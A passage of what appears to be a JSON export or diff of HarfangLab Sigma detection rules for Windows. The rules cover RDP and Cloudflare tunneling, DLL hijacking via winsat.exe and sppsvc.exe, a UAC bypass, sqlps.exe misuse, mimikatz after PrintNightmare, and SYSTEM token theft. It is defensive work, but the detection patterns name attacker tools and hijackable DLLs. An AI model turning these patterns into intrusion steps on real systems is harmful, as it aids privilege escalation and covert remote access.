non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.082797Z", + "creation_date": "2026-03-23T11:45:34.082799Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.082804Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/nccgroup/SocksOverRDP", + "https://attack.mitre.org/techniques/T1572" + ], + "name": "t1572_socks_over_rdp_configuration_set.yml", + "content": "title: SocksOverRDP Registry Configuration Set\nid: 
15fa5274-bd22-4eb6-862a-dfc8deceaaf8\ndescription: |\n Detects the SocksOverRDP registry configuration being set in registry.\n SocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\n When registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\n Adversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\n It is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\nreferences:\n - https://github.com/nccgroup/SocksOverRDP\n - https://attack.mitre.org/techniques/T1572\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\AddIns\\SocksOverRDP-Plugin'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8", + "rule_name": "SocksOverRDP Registry Configuration Set", + "rule_description": "Detects the SocksOverRDP registry configuration being set in registry.\nSocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\nWhen registered, 
the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\nAdversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\nIt is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\n", + "rule_creation_date": "2025-09-24", + "rule_modified_date": "2025-09-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.001", + "attack.t1572" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619209Z", + "creation_date": "2026-03-23T11:45:34.619211Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619215Z", + "rule_level": "high", + "rule_confidence": "strong", + 
"rule_confidence_override": null, + "references": [ + "https://github.com/cloudflare/cloudflared", + "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/", + "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", + "https://www.intrinsec.com/akira_ransomware/", + "https://attack.mitre.org/techniques/T1102/" + ], + "name": "t1102_cloudflare_tunnel.yml", + "content": "title: Suspicious Cloudflare Binary Execution\nid: 161d8bc5-7221-45bb-8d1d-89c6eae319c4\ndescription: |\n Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\n This technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\n It is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\n - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n - https://www.intrinsec.com/akira_ransomware/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2025/05/15\nmodified: 2025/06/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n Image|endswith:\n - '\\cloudflared.exe'\n - '\\cloudflared-windows-386.exe'\n - '\\cloudflared-windows-amd64.exe'\n\n selection_imphash:\n Imphash:\n - '2548C430C08A1B7D76EDE5D863ADB956'\n - 'fc22e4f95641f6606222121e1a8a8508'\n\n selection_run:\n 
CommandLine|contains|all:\n - ' tunnel '\n - ' run'\n\n selection_token:\n CommandLine|contains:\n - ' --token '\n - ' --token-file '\n - ' --config '\n\n selection_service:\n CommandLine|contains|all:\n - ' service '\n - ' install'\n\n selection_url:\n CommandLine|contains|all:\n - ' tunnel '\n - ' --url '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: (selection_image or selection_imphash) and ((selection_run and selection_token) or selection_service or selection_url) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4", + "rule_name": "Suspicious Cloudflare Binary Execution", + "rule_description": "Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\nThis technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\nIt is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\n", + "rule_creation_date": "2025-05-15", + "rule_modified_date": "2025-06-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1102" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + 
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.587736Z", + "creation_date": "2026-03-23T11:45:34.587740Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587748Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_winsat.yml", + "content": "title: DLL Hijacking via winsat.exe\nid: 1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d\ndescription: |\n Detects potential Windows DLL Hijacking via winsat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 
2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winsat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\version.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d", + "rule_name": "DLL Hijacking via winsat.exe", + "rule_description": "Detects potential Windows DLL Hijacking via winsat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + 
"rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092433Z", + "creation_date": "2026-03-23T11:45:34.092435Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.092440Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "name": "t1548_002_uac_bypass_inetmgr.yml", + "content": "title: UAC Bypass Executed via InetMgr\nid: 1659265d-21ea-4fb4-8440-e0a5ea0f2567\ndescription: |\n Detection of UAC bypass for `InetMgr.exe`.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to 
investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/08\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\inetsrv\\InetMgr.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n cond_ms_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not cond_ms_signed\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567", + "rule_name": "UAC Bypass Executed via InetMgr", + "rule_description": "Detection of UAC bypass for `InetMgr.exe`.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\n", + "rule_creation_date": "2021-01-08", + "rule_modified_date": "2025-01-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002", + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1677f32b-ab7c-4b86-a079-48c3166975e0", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.595711Z", + "creation_date": "2026-03-23T11:45:34.595714Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.595722Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility", + "https://twitter.com/MsftSecIntel/status/1526680337216114693", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1127/" + ], + "name": "t1059_001_suspicious_sqlps_execution.yml", + "content": "title: Suspicious sqlps.exe Execution\nid: 1677f32b-ab7c-4b86-a079-48c3166975e0\ndescription: |\n Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\n Attackers can use this utility as a LOLBin to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n - 
https://docs.microsoft.com/en-us/sql/tools/sqlps-utility\n - https://twitter.com/MsftSecIntel/status/1526680337216114693\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/07\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1127\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sqlps\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Microsoft SQL Server 100 and 110 are PowerShell v2\n # Microsoft SQL Server 120 and 130 are PowerShell v4\n OriginalFileName: 'SQLPS.exe'\n exclusion_legitimate_parent:\n ParentCommandLine|contains:\n - '\\MSSQL\\Binn\\SQLAGENT.EXE -i '\n - '\\Tools\\Binn\\ManagementStudio\\Ssms.exe'\n - '\\Tools\\Binn\\SQLPS.exe agentjob'\n\n exclusion_interactive_shell:\n ProcessParentImage|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1677f32b-ab7c-4b86-a079-48c3166975e0", + "rule_name": "Suspicious sqlps.exe Execution", + "rule_description": "Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\nAttackers can use this utility as a LOLBin to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\n", + "rule_creation_date": "2022-06-07", + "rule_modified_date": "2025-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + 
"attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1127" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1693e403-2800-4cd4-b918-144cf1d96336", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.609367Z", + "creation_date": "2026-03-23T11:45:34.609370Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.609377Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1574_spoolsv_mimikatz_provider_load.yml", + "content": "title: Spoolsv Mimikatz Signed Print Provider Loaded\nid: 1693e403-2800-4cd4-b918-144cf1d96336\ndescription: |\n Detects spoolsv loading the mimikatz signed print provider.\n This is a sign of a CVE-2021-1675 post exploitation.\n It is recommended to isolate the affected assets and to look for attacker activities on other hosts.\nreferences:\n - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n Signed: 'true'\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1693e403-2800-4cd4-b918-144cf1d96336", + "rule_name": "Spoolsv Mimikatz Signed Print Provider Loaded", + "rule_description": "Detects spoolsv loading the mimikatz signed print provider.\nThis is a sign of a CVE-2021-1675 post exploitation.\nIt is recommended to isolate the affected assets and to look for attacker activities on other hosts.\n", + "rule_creation_date": "2021-07-06", + "rule_modified_date": "2025-04-08", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080546Z", + "creation_date": "2026-03-23T11:45:34.080548Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080552Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_sppsvc.yml", + "content": "title: DLL Hijacking via sppsvc.exe\nid: 16a70c78-b3ad-445a-bef6-ca597bfdb2b3\ndescription: |\n Detects potential Windows DLL Hijacking via sppsvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - 
https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppsvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\pkeyhelper.dll'\n - '\\webservices.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3", + "rule_name": "DLL Hijacking via sppsvc.exe", + "rule_description": "Detects potential Windows DLL Hijacking via sppsvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + 
"attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16ac2b82-bf41-4651-832f-0b67481cbba0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.596042Z", + "creation_date": "2026-03-23T11:45:34.596046Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.596053Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c", + "https://attack.mitre.org/techniques/T1134/" + ], + "name": "t1034_possible_system_access_token_theft.yml", + "content": "title: Possible SYSTEM Access Token Theft\nid: 16ac2b82-bf41-4651-832f-0b67481cbba0\ndescription: |\n Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\n This can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\n It is recommended to analyze the behavior and content of both the parent 
